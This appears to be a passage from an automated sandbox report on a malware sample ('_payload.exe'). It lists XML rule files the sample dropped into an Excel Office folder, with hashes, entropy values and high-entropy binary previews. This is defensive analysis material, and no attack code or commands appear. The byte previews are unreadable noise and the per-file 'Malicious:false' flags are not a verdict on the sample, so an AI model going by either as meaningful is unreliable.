                                                                                                                                                                      Preview:<?xml.)....L=.3.....e..ER.6..5.+...(SP.4.L.6.-w ..,....Z.V.0.....N.3..Wz.....b.i.AZ..........X.+...t[......z.5.....x.e<#!.#&.;..)..D.L...........bvLl.UO..<#..Bd...}z*.(.el..z.h.B...(+V.8J.?..C.....XG..u.X.@.[^T.#%:q(.qC6.....1....laa.s.e..}+-...\...W)....pT...IU_...i....U...A...<)|.&i?r....P..7._...C6]d.)K...K..o$..l5.....^..x....sd.o>]....i..Cp...N.4`Z..........?..ROT...h.......;.....$.z.+.Z/d..[..N....(.y].$u...@......=........x..`...r....\h..<...a#_!d......2.[....N.O.fF1.. 9U\.f.....S...5>.`....n.:}in.....%..O1...k.*H.?....AA3Q.'...g.K..(Yx.H]X)..x...@#..G<.....B.E.X....u.Zh...|.T.....^.F.Vd.|vO...SJ..#y.M...hp........WqTmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120636v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):805
                                                                                                                                                                      Entropy (8bit):7.7458499304849555
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8yJeAqq5U2rWRW/zZPPN9rIGDg7xSa1gLWt+q4iHfqyNUVSUdNcii9a:gq5FWW/zNPPr8gLWMUH/NU42bD
                                                                                                                                                                      MD5:A54F2E069A011E32B5F55E655F492173
                                                                                                                                                                      SHA1:97B6EFF50F30E01B131389B47EE30B5CFA89DFFF
                                                                                                                                                                      SHA-256:2BEF0F9EC6A752F61AF4BF519BC8A29FC004F3BE85115D05FCAD9FF33722864F
                                                                                                                                                                      SHA-512:AD0CCF364B9D79CEF01D76ED58B1EA2BF3E89D4C478FE9B5C44D59C0C81B6305DE63905B82EE552C5987DFD1408CDC49048F201DD48FA19CEA50B88324EDCB99
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlsB..`.U..m....H.Wp....A..j......!2.8m.....D3..-...x.ri-W...%...kd..$R/...>...@D.................."..).h\.k%......}..R.......rw.xi.&.*.,/].+R.w._...<..@.a......j.M&....Q..u.}..._....Sw!P..z.oG..H...........VJ!\...c.O...+.....$E... ]..w-oa.A,.....b....b.N.Hz.:.w..B..Y\.Z..2......A..;+k.......kX.!.n>.n......4Z.r.'.8...s....l..$:B..F.k.v.K$S.d..bC:..[Y.........Z(y.Fg..b....j.d5.}...P..5....Fs>...:.......b6..F=..?\c.N.V.V..Jk-..D#..........&.h..b.h..g...'a.+5@q.....Is..#qYw....b.%b..Qz......(..9...74b...8.A.G2....f+kP....Ko..H.t;.V.ws.....r&.......V...].{k.C..?..<!....$.{.....Q..5.0.eR.48..DG.9V..v....x.1.[..>....n.%H.J.ts...?.y.....MN.h....T........tv..Z..].._..1.t...qN..^mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120637v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):760
                                                                                                                                                                      Entropy (8bit):7.762676302927905
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:aqcwWWUJC/FbstpxsVpTtCix/g7mSiRXHa60DZ5KzdA7k4m/GSSUdNcii9a:ajtkEsVpTtCS/HXHIN5E43h2bD
                                                                                                                                                                      MD5:0D0D16B02CAA72F95FC269B4984CF4BB
                                                                                                                                                                      SHA1:6B37ECB141B7A4D0A031AFB09DA8C0121639E688
                                                                                                                                                                      SHA-256:4CFFCA946F041E6CAD3D02743486716D891C49D77109DFF3F06E681BA5831D14
                                                                                                                                                                      SHA-512:2DB4F9D4328E83FFAF9CF66237F15D97E8A519111F1B112E800AA48766F74A0F7BE74A57684F8B11A0AEAE2ED04AA40F49927022882E3298EBCEB1DE649B3103
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml^...i.pC.+...z."....Ir.Q.'.W..<.s.D.M...O.0.%;K.....I,0.|&..;1H_..Y....*p.(.0..r4..E..jK..H........@9"......%..qP0....e.3...q.....\.`..9...../t.....c.grj....o.Us.K.i.......O.h(d.... N..(.w..........Q.....V...o.<..O..>]3....gH.}.H."I..F.I...-..b:..6'.t.C.......`;........b.m.. ...t....z..h...F..a.T`....qN$.AT..w,.Q:g.v;....o.$^@A...~?.QCW.R.....0.S.v.b~.....<...Z.U....ui...B2.h;..A..!e.S.X....r]\...&.".Hw..O}m......._S].E*.4`D..q..e.."...Q..k..<.y...|*.........|....-....X`"...Qu.lH..K....}G$/wx...r.......q\-m[..*pM.Y.......9.1.71.j..(..c.....U.E.$.....t......&..Q.'.h^..9.>..{...b<|X....7~E._..[.X%.....].U....5..\...t.b%.vJ...I..P.{mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120638v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):819
                                                                                                                                                                      Entropy (8bit):7.747087719998357
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yTIrlQgB45lqCTMd5WOAF2+z3MRm4AFgMhCO2bD:DpjqjqCopAd3rFgMhiD
                                                                                                                                                                      MD5:F1834EF3B59CAF93A3F40E53CFF912C1
                                                                                                                                                                      SHA1:E54D207ED019987C8812E7A51B08DD9CBE3B2005
                                                                                                                                                                      SHA-256:323B52BDCEAC882B308AC43FB34DAB33053CE28C210BE5CBEE1DB678B89A4D46
                                                                                                                                                                      SHA-512:278C5A9D32A94146AA01D3A36600A2313C0160769EABF30E609231C18710E23C7C17DBE1E676B7EE1B39DE56182AEE47432C5D43B0551A52D2576A9F524ACE57
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..)!.....Qq...lSX...n.. .6.......@..w... ......M...i%.....*8....wSg.......#....<.h%.....E@.....f/....j1XI...$P.Y"X...>.xa..{X...m....>@.be~..8#..v.p.=..]l....dY...!..>J...,. .C..].S...,....1<.3.Y...<%.$...'(.$.mj.V.6...+..57....+..1[..K...2.Hm...;.b.1S.......X.uL\\.6..S...{.....W,`.S..@..FVXt...A.5E^..9..".n.`7phJ4..P..~...c.c.5.~.d.'.....1...*|....+ B...*..?..W..X.e..1....R..$..w.c.....1....).oT1a.......*.....L....U..g+.PCS..K..7GA..e#.....Y..!..pe.k.......=.R...ya...1..:.`..D.zF..r.J...x..|cr.$m%./.7k....S.M.Z....s.,O...$..b.EnO......L.K.....K[88..|.G. $.-..W..O...#J,o.D.$..@.%.(D^3..%,.Y.R.j...m..#BT.N.!R...KK........v....w...yC1.0.+.^.?~..M......\C........b7}..N..P+.xD..:.........!....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120639v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):756
                                                                                                                                                                      Entropy (8bit):7.651742055466627
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:102672tx/GGmRTMUrkAyPEhMpR/GpZfPk0c9QtZB/5ax7gxSjRrL+d5+dpmYCl33:1ldmRTM2cEUUfcMtZBUpgERH+aU3+9hw
                                                                                                                                                                      MD5:F6D5FB973E7890251F4F604F74011F5F
                                                                                                                                                                      SHA1:9FDB3341630B7C49ADBBF2CDA6DB53FD0F57C882
                                                                                                                                                                      SHA-256:442BC9FF7C81BBE79998A8401142B16EB099EC0E5C35EC976FC0AEFAE016C93C
                                                                                                                                                                      SHA-512:CD094B5D8389F61D63F109BC14244645A14DDE9AA02B8600C1B39D5008D8C7CE409CD269099813D0F203D1ACB73C8C7B8008422596033BF46D31C25215127963
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmloCzZbr.?=mQw6...d#S_T.|o..e.P.."..B.1ze......Lt....D..._..$)...S.*h B.S......P......\..}....f.c../.u.Y]X.....W~EJ5M,...<.8<wQ4.V...~.e.>j}."U6-p....h..p...t.9.(.G....$.*.e|.....?:...........*a.p.4<.*.LJ...M......gS......D.7..%....T...R......3.6..0y1r......|ZT#..Z.g.!Z_.|x...`9#...-./#&.....j!',P.G{.7.0.....9v:?..s.s.*p.Be.....f~....94.V.....L U.')p.TM...N....:......../ds..p5e..]..f..y....R.......D.G<.bp.J`T..)...7'.?...a..\~.v.M|3.~.,..d..k..FY...~.o..k#Z....k..Z .u.0...<.ml.l.S\z..Od...D..BR.f.]7..6[.m.../.-......z...t.f..-X...8.:..=.B{.x..Y..c..D.U...{.}8$.R.~5C7FUU.n..A.}t.'.#......L....../.l.j...)p..p......:.....3.......@&.X.P+..NmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120640v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):811
                                                                                                                                                                      Entropy (8bit):7.67705595633999
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:gGb8rOrcN0v0ws1hpo+cPSnS2FCqywzobofC4TIPXJWKoCbdud2URrf/9VSUdNcq:7rcNnwsBNFcKC4TyI194URrW2bD
                                                                                                                                                                      MD5:930D27864ADC16AC08F2A16F404EDCC5
                                                                                                                                                                      SHA1:B2E9ECE6D0CCE9ACECB410053D58FAD218A611F9
                                                                                                                                                                      SHA-256:1604610525A613779F775FB2933348556F2C421423202C3295AD99A4809A7AD6
                                                                                                                                                                      SHA-512:B2838EC0EEC6761528CF60459C64740CFA3BAB58975DBACDD919CE80ECFE61E63C3649854D05F5F3074A234B372F14D58588CEE972D6F1DF2ED9813F78A8A42A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...n."|........._/...P'.a|y..{{......{.#..}......L.9K..|.3....+{.m.5.\.X.m-...`]..a.ar..C..m......>.i[Djt...=....]...Sd.%>...).....g.|'.*.B.uU....{a.P.|...K.l.'.X:9....".s._...di.9.......~....:t1...)..-.J.C.(....%.w.v..e..)Vd$...... ..U....`.....%...iu.``h...]..AT...PdN..=.~6..........t....Q.V..c..u.j.g....,L.PRw)c.......amkR.8k7...[....(.......g.4n.......=}......Gv...-oD..;.kP:..$[.......as.Eb..xJ.a.'.Cz&..5.(.8..Dcv.#..l./..,.F;m.UN.N.......{@...~.6.33......[.V]...l0..=.4.......qU.0[..iG..+..P..v..o.ZJ..'z.b...c4x...{.6....U.FCR|X.N.6.[.&.9..s..8zbU.]G"..[L..o..8...B.]..N.;....T.M..~.{=..Z..q..eW!.I...Yl~y...W(H...w*....YQ|.;..M.0.6_.<..T....G.F{f.{.,.....F..........*y..>8.]'.E-F..*-..>c*mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120641v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):737
                                                                                                                                                                      Entropy (8bit):7.709120514779387
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:B282lS5tqXyEth3pgg7yKe4owPmUmmPxtcJvPDamOR7XhyPAzu6O5bq2ydDxADj4:MNlesfthZulumWPxtcJnxORVyPATEWZX
                                                                                                                                                                      MD5:9EA5E14A8E907DBF0E209E6E47B319A1
                                                                                                                                                                      SHA1:4F800401D2CB4F167F214DCD311676035377055D
                                                                                                                                                                      SHA-256:98970D86C0C6C7D6E2CDB84A8E0AB4688F3D4ED741A1AB3EEE51DFE0762FBF3E
                                                                                                                                                                      SHA-512:8535145C5CEF4D54801D8E8ABB32450459C0851CFB5E36115C202D484B663E97437E8B84ECEA2486DA832DDDA5B28366E88F9064047C019BA2F986BF256879FB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.V.^.J...l..N..o........N...z..AB.......s...yR.A....Q..T..p..Ce.0.<...~jx.....O....8.8..~...X.......UK...-9l..#...U..K;.f);;.w.........d.B...=...8.!......K]A...E9.c....Z@....t.g....ASj.8.n.V....u.Q......FHM...2-.2..|.r$w.uA...I#....d.x.......&.V..d..H..sG.`.........8.G..f........S..A....z.....tK. .rwu.Wpm..i.c...qlz..W..n......r.=i....\I.....*.w..'E.............s<i..:...V...SJ...x...p.[...g.i.B.H.}J.$.d(...Xq....t......_.%.X.m.r.A3[........Dm.W&...KD..Z"7..=.q.SH..(.....*8]~/rG..y..B.:YO.....e2.%.p{7...^..s.T..<p.L.Qp....J...T. ..'%5....3.{....I.%..!.W#.ZV#...*.Iz....W.]..w..-.. ....}....x....N=..c@..A..%..q.]....A9mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120642v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):801
                                                                                                                                                                      Entropy (8bit):7.704376387992293
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:hI3wW8MOy9ksbytaQe+1sJIRl1ChZZ7X2bD:hUjhO4ksbIe+16Ol18rUD
                                                                                                                                                                      MD5:4FF0D8D10E5C314790B13EDB034D98C2
                                                                                                                                                                      SHA1:F6CAF7A91734A44731446B44E855B90702745F71
                                                                                                                                                                      SHA-256:BA42262B0650DA9B159FAC5521C1A7EA749DA017708B595CB49E0166679BFAB8
                                                                                                                                                                      SHA-512:2A258981CB29E3F699EE6444CDE305713A0599BEAF3E65E93C5ABF8209DA727BCBFAAB350E76672FD85D547D1651B3AAE81D69E9F62D5E1F35C798CEADEB7298
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlr.......<.uW0?....h.'......1..]..l.W.99c.U!u....y3.Y............<..y...,..].d..Q..5..i.?.pc..{..AMk...S./......3....@......l........]k..~...g.)Z.*@b2..q.).*..,......@V.1A.wg.....}.Vn.!.~#.....!.V..\.ra....4..-}.........U.u....\.}/t7.......N.D..m.._#q.."h..}.<*...i...~.-......p...C.n".....J.......0~Y....f..:..b..N+...t.E3` ..6.Q......iN..D4.u.g;".g,..7?<).b.. ..kC.>.o.....z.%.T%.l.)....!9..J_.4.$~A....7.\...C\.xW.Ph.G......6...edvIAR..k..N.#..|.g..9...M.F.......~.4.}......HN...V6D.`@..c..T....h.<R..R...^..n......`X...?r.p.3R.2%.=.c.w'].?+......w......)V.....8:h2.F.[.,H...gW..5F.82.]-.J.b..4.i...Pt2.a1Q4.gE.@..xt.....Y.? .c.U*.`..\.....,...........bH....r...X...a..y:.+t...Dp..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120643v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):733
                                                                                                                                                                      Entropy (8bit):7.685142401715983
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:2f+IrEV2W1SrksZyMLkmae9p1FNgSsxhRxTdZkma0m3dDWitNlcP8JhPY2A5Y0/P:2fda2U1sZy/mf/sXTQuUVCEJRY2A5Y0X
                                                                                                                                                                      MD5:7E6F7EDFADF36B6C9C4092BAD2286FEA
                                                                                                                                                                      SHA1:D8E49052F086A7E10DF1E21141F19FD2DEB61AC7
                                                                                                                                                                      SHA-256:6BA81EC4FC844A879CEC353E723A509A57B878B80AD364AD861E0175E640621E
                                                                                                                                                                      SHA-512:679AFD8557C6ADF5E7066A66AD5EF0B627DA9F488A6219A90E00A4037EE90AAB0EFCC6B6FCAC0C0BC6225929009E85C19A96F18E2CE45448DCFB39125749BA82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.5B.=........-.cdK...+..CH%^=!GP.B.a..{...a...*...`9.>+....}0.r...V..0..$.EeXN....p8....g.....U....S.G.>G)..D....A..Z....S...V..o....`.....a....m.......k.CV..2.....t1bb\.HM.........A.Q...H.9.n..T...[.P7a.O:y..G&8......ei@.T.....+...pW.....Q.v.`.a.j8.....;...[....G<.{.....v...>.b...........-*..Z....w.......G...18_!.d .&#.l..N..>../.{....$.6..8v....#...5.z..s..z.....h&z.....4..Xj.....w.u'..P.:.q.!.pv.'.....i..?..%.....z.R.....`..+...^7j.'...%!.gH. ..-.....7_.w.=....{..Z.}..0.I.HD.#H..6z.3.(...O.M...\k .uni"hc<........;5$..k(..z..i.mx......$`...2v.&.P.(.8Hi.X....9.......CD.-k:...<e...O...........O.;-...(l.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120644v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):812
                                                                                                                                                                      Entropy (8bit):7.747171178504303
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:KqMNE8eLrN8RXfEIaa/7ZvM9NCXjySXEAs9V2bD:uoLoXc/qFG8vXquD
                                                                                                                                                                      MD5:F5BEEB93D991331AE7734203AF408C46
                                                                                                                                                                      SHA1:03AC0C098EAC081B0165FF52C561EED5E751E598
                                                                                                                                                                      SHA-256:3B2710C39904FAAB32BA21975BFD0D12772316F10BC311DA505667617F0AB93D
                                                                                                                                                                      SHA-512:525192FA43EC8F199575085F4A28D9570712B59B2EB3C91D8E4B7CD92EF00380EB28D99922857CFBBEAB7FBD1273C945A28137629884AFC8573365ACC420AFD7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmll.J..4...U..^.....s.o..b......j...v9.B5..u9...X.].9W..n.k.~.Pu"...f.......~cX.b.*.0.9......9.P.2t,J C.r...(|........?...2X...%....z...z.4....z...g....c....HX-l.JM..@.\...5.}<G....8>..}O....W-.7.......{k.%C]m3.t.1*....J.q>........_..Ea...O.+..~q.+Y.....~.].v-D.:..........>.>..'.Y..j....gF..]..d.EOS.$2e.......=6U........J...i\z.Zp#.s.....j..T>...A..g.Q.;M....XH2`.q.....o.e.Q.n.`m..$.ZsF.)...<o..7......$.]..Cw....K.[...2.......y..|..+$J.-.%...baBt.{M/.?..o.j....>._..........^...w.)&..`gM._.-...w.....Oz 5a....,....[.8...$T.......5.....^B~..!.u9..*.X....H...{"K.......g..<.O.%......,.j.l|.(.,.....^7..*.P.@.2.?.e..i..,5..Db.......r.rzRq>.....l_........hj0}..^.AH.JF.W.g..W...R.#......r.k..S..>VmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120645v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):758
                                                                                                                                                                      Entropy (8bit):7.723890305594524
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:GoIkqs/tBiTU+jhKbhCmWWe885VyaVGCY5mDbL9kGhpcraJlEVCAUjSSUdNcii9a:sk96TU0hY0WsJY5KphyfVK2bD
                                                                                                                                                                      MD5:4137A7AFCB793EF943B66EFAA30B0B79
                                                                                                                                                                      SHA1:E914B792B0BB9A58EE777A91F438D582D81E27E1
                                                                                                                                                                      SHA-256:33CA84E09E86B1529DFC1A4A01D9E7A6C3148B204FFFC95277F2E5C23193A186
                                                                                                                                                                      SHA-512:7FCDFBF34EF7087FC039150D930556520039243DB7015DF664B979BE5AE0715E743229BCA6B1E42C63739560B0541FEB3CF5D2DEE4C072138947F2DC65E34ED3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..4.......>.#.=E,.(...m........B..*...ty.B...`.....>.f..Ho*....F.uO...u..c...X..3.S..W......+..e.......l.r.Z..%.....m7.b.R^....?.C.H6...c.tnH.y...l...!2#[...y....J.8v.<.y.....~E...].....c..8...Tb....Ce.3@..._n.:L..x.._....3w.i....d}.mS...Hn3.Q....LM.(..h..&...v6...J....h:.r....Fe......>l..0cL..;..s....wb..vp.Y........P...C..3......4........q.....[..pO.....C...^.[8...j..!Q..q..Fv...-..;.....oM.Y0...UDo ...v..C7/..b|...j......WA..`..&.....R.b..7e&9......>.....GY..........X...*..K+.....r....`....\g.b.GN.d...G..e .KC....j....z...u. ..Py...fc..15.O.Rs.s......3o..UN.....w`.r.....3..yq../.XP..wT.g\.l..w.....Jr.9?.B..|+.....)..K..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120646v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):808
                                                                                                                                                                      Entropy (8bit):7.732758026040982
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:IUB625DmGvJfd4HVIaTF4/38F1/NCnzoSLc0zouSRQRLJgH5481aSUdNcii9a:IU5bftMFQ8FVQz/cwouTJJz832bD
                                                                                                                                                                      MD5:11AF9022340DF1A303D80C678990DF27
                                                                                                                                                                      SHA1:2F2CBCE06249472383BD422642567F7A5D298762
                                                                                                                                                                      SHA-256:EC51613F3D585F32C740BAE7824CEB61F054F1A392E6B7DEE64CB524F6EBBCEF
                                                                                                                                                                      SHA-512:A56B128206ABFA664F127BC24B3E1B71009B5D78BC1F54DAAF8D058E4CA9D050EC2BAD5B7C00931CC71A38798BE879BEA47B7489A3209180E62A9E7C78A8873C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlO].(.l.[.Sz....FT."?..0%:K.y..=....s.Y;..`B.....l./..y....q...|A.,..@!....[.H..^).@."i..Pg-.... ....&9)..T..F...B....?....W.....K.''.):...;.k./.m..u..U....R:..D.#Tt..^k.d..C[.1K.E...iK)'..~......^.?O...|.. N..]...sx...T.-|.1_.s....}.K6.C......7l...h......$H...&.qx.......Qs>..9..,..{.....[...}..(Q.rY.......O'eK....W...3.Wc.03...1..JxNSx.}.^....O.7.`.....I(.84....N8.;....-.]......`eq..p......UhN....>.`/...~.....Z2...c........y?.Z#._..~...P....Y.,.C{p.xc^..Q.....L........!..+.......I.1U...3...~!0s7s....R5w9=.U.W..U.?./W.<..$7....X..J..\...e2.GB.....)..eD1....5>.-.&.L...Hzt...Y!45.t......Et....F.:...^....GP........8..&.'E...'...S..N.f.{.nu....>.@......`.;]k.H...'\.....a<..1t..`...8.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120647v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):781
                                                                                                                                                                      Entropy (8bit):7.74523785608557
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:+rIZNqrakJkls3kxJ8gAEJIxWm0U6s2MfgADUWGr0SuLrNGZTlhz4CySSUdNciik:+kLq7qlsUxJ8gHJIvlUQjGY4Zx+Fh2bD
                                                                                                                                                                      MD5:8FF3E4002AB9292FE7A8063FE0896FAF
                                                                                                                                                                      SHA1:455FC83DC3BD35C960977507ED7ED2B84F44480E
                                                                                                                                                                      SHA-256:DB9F6B7C72E357AC6DADF033FBEEFF7399F86A609C12EB96BEC62F83A8E6F3AC
                                                                                                                                                                      SHA-512:8B1E25492A58E63D23FCF2841001F9E68D8FF6A618E55560B86EE878C6B7A132E2B8165E5BC5C4C1780787477BF760B05E6F9AC9CDD63C9A71A7E1CD4783E55F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..$.....ic.S?c..:.....'...Oe...`c.z.. ...@.V...(..D.qf...K.M.c...7..........N=F..O<..)...k.`....S.\`...MV.@.h...V.....d.M..l..,J.nmA..6..$..`,....$..-.v.[..E....1.M.a.x`^.Q.7VdF+..f2-..u.%... .n{.]..j../#.{.^....]?..i.*....ejY....].Hx..e..92s.d.......::.0...#^+1.t.....~...bx'jX?w~Q.a.qPT.......L.N.>.........................."4w......IZx#.....wG...1..j-.1.t..E.s.....D.Q..S.....ac*.3T...sq..".n...........[A....D...Ph..`.-.n.,.O.<.g.....r.....M?..C.j..isl.W...l. .....MC^....u.=....:....R...a^,z....j)h..w.k.(..g#........iL..y..(.rR.#...4..N.....Jc..2ct.|~..WX.8...1$.2.+&CK_hD+.'...-w].....09.^.<.=...S...oC.&.a....\...F=I..-.[s....[..|=..3.f._..v.;.q........Q.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120648v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):824
                                                                                                                                                                      Entropy (8bit):7.720999288743511
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zXllFO+GSpEsXBwZu0rWb7E/8Ey1/xt2bD:zV7XmsXqB/8EoGD
                                                                                                                                                                      MD5:DFF7CD4E62548D2958BD670B3AED5CC0
                                                                                                                                                                      SHA1:615F6F895F93692EC7ED1CD946C0DAE9423A9AC5
                                                                                                                                                                      SHA-256:1F3B795215B1D67F3685F960C99CF952A92ECC49885C31599876A78E8489988A
                                                                                                                                                                      SHA-512:8AF584FA8D6275CC6643F94470248F36FDC510084B8979C137297018BC300873374256F952C197AA6AF147D3870E29D01E0DD64D5F8F8016CC728F7695F8825F
                                                                                                                                                                      Malicious:false
